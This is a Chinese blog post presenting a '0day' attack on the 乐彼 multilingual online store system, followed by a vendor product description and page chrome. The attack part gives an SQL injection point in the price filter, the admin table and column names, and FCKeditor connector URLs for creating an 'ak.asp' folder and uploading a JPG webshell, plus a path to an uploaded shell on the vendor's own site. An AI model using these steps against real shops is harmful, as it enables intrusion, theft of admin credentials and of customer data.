乐彼多语言网上商城系统 0day

这是乐彼多语言网上商城系统!

随便找个url试下注射。在按价格分类的地方存在注入。

 /productp.asp?sprice=1000|1999    

管理员表段为 Lebi_adminuser  字段为admin_name admin_pass  

不细说了,得到管理员帐号密码! 

登陆后台,添加商品。发现后台是用了fckeditor编辑器!  

直接通过fckeditor拿去webshell !

经测试。发现通过fckeditor 可以直接得到webshell ! 官网存在此漏洞! 不过官网是用了IIS安全软件之类的东西 x.asp/xxx.jpg 不能执行。 由于着急就不去继续了。应该可以轻松绕过的。  时间仓促未能图文并茂。 留下几句话 直接创建ak.asp 文件夹 上传jpg 小马 的代码收工了

   创建ak.asp文件夹

 

复制代码

1. http://xxx.xxx.xxx/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/ak.asp&NewFolderName=ak.asp

上传jpg小马 打开url  选择ak.asp 文件目录然后上传 .jog小马

 

 

1. http://xxx.xxx.xxx/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp

我们的小马访问地址是  xxx 是随机的 记住你刚才的xxx.jpg的文件名称即可

    

 

1. http://xxx.xxx.xxx/pic/UserFiles/Image/ak.asp/xxx.jpg

官网的未执行小马 

 

1.http://eshop.56770.com/lanshop/pic/userfiles/file/1.asp/20100104162153806974.jpg

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
乐彼中英文网店系统V14.0.0 to V14.1.0 升级说明 [修正]支付接口支付错误 [修正]升级宝付支付接口 [修正]会员充值不能写入日志   乐彼中英文网店系统(56770 EShop) 是一款基于Web浏览器和客户端技术的网上开店软件,它把浏览器、客户端和服务器这三种技术无缝结合为一体,界面灵活,功能强大,后台更是和服务器一样稳定、安全、可靠。   采用UTF-8国际编码编写,操作流程采用国际标准设计,完美支持世界上任何国家语言,并根据用户所选语种实时切换,为企业进军国际市场提供强有力的支持。   SEO优化理念:乐彼具有多年的搜索引擎优化经验,并将搜索引擎优化理念率先引入到软件设计当中,用户只需要通过在后台进行相关优化设置即可轻松实现在各大搜索引擎的排名靠前。   看得见的SEO优化动作:静态页生成(HTML)、伪静态(URL Rewrite)、自定义网页页头(网页标题、关键词、描述)、自定义文件夹名称、自定义商品静态页面名称。   网上展厅 商家通过后台将经营的商品发布到前台,顾客通过浏览网站可以通过商品类别及商品检索快速准确的找到自己感兴趣的商品,了解商品的信息及价格。店铺内常用的店长推荐商品及、最新上架商品及打折促销商品可以更好的通过网上商店的推荐商品展示区、新品上架展示区以及打折促销商品展示区展示给顾客。 多种商品展示效果:图文模式、图片模式、文字模式   商品订购 顾客将中意的商品通过鼠标点击购买按钮将商品加入到临时购物车中,用户可选择继续购买其他商品或去收银台结帐。进入收银台,用户将自己的信息填写好后提交商品购买订单,并可进行线上付款操作(线上付款支持支付宝(即时到帐和担保支付交易)、网银(即时到帐交易)、快钱(即时到帐交易)、财付通(即时到帐和担保支付交易)、PAYPAL(即时到帐交易)),此次商品订购即完成。   动态发布 商家可通过后台发布最新的资讯信息或促销信息,顾客只需要浏览网站即可获取到商家最新信息。   积分兑换 顾客可自行在网站上使用购物消费所累积的会员积分兑换自己喜欢的礼品,此功能可有效增加顾客对商家的黏度及好感度。   订单处理 商家可以在后台查看每天的顾客订单并作出及时有效的订单处理,订单处理后顾客会接收到来自网上商店的关于订单信息的电子邮件,方便顾客关注网上店铺的订单。若商品售出,此商品的库存数量也将随之改变。   业绩分析 商家可以在后台查看每天的网上商店销售业绩,以便商家了解网上商家的经营状况,随时对网上商店的经营进行监管。   顾客管理 商家可以在后台查看在网上商店登记注册的顾客姓名、联系方式等信息,以及顾客在网上商店的消费信息及商品订单信息。商家可以通过站内信箱功能与顾客进行联系。 商家可以在后台根据自身需要添加或编辑会员等级,如铜牌会员、银牌会员、金牌会员,并可在商品管理中为每个商品设置不成的会员价格,如铜牌价 ¥8.50、银牌价¥7.50、金牌价¥6.50。   信息管理 商家可以在后台设置新闻、帮助的信息类别及对信息进行添加、编辑和删除的一系列操作。 商家亦可以在此发布商品销售专题,在发布行业资讯的同时,选择相关的商品一同组成商品专题,使顾客在阅读行业资讯的同时,购买相关的商品,增加商品的展示机会,提升网上商店的销售业绩。   商品管理 商家可以在后台添加商品,并可为商品设置不同的属性,如新品、推荐商品、促销商品等,每个商品可以上传多张不同角度的展示图片,可以归属于任意多的商品类别,可以根据需要选择相关的附属选项。灵活的商品管理功能可以使商家的管理游刃有余,批量的操作更为商家的管理节省了大量的时间和精力。   模板管理 系统采用三层模板架构,商家可以在后台对网上商店的界面风格及信息展示样式进行更改,简单且容易上手的HTML语言,让网上商店的个性化发挥得淋漓尽致。   系统管理 商家可以在后台对网上商店的基本信息、会员注册协议、配送方式、支付方式等几十项的管理信息进行管理。   网站发布 商家可以在后台将自己的网上商店发布为静态版的网上商店,将前台主体页面生成为HTML静态网页,可以加速网上商店浏览速度,提升网上商店形象;同时可以大大增加搜索引擎对网上商店内容的收录比率,为商家节省大量推广资金。         相关阅读 同类推荐:网店系统源码

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值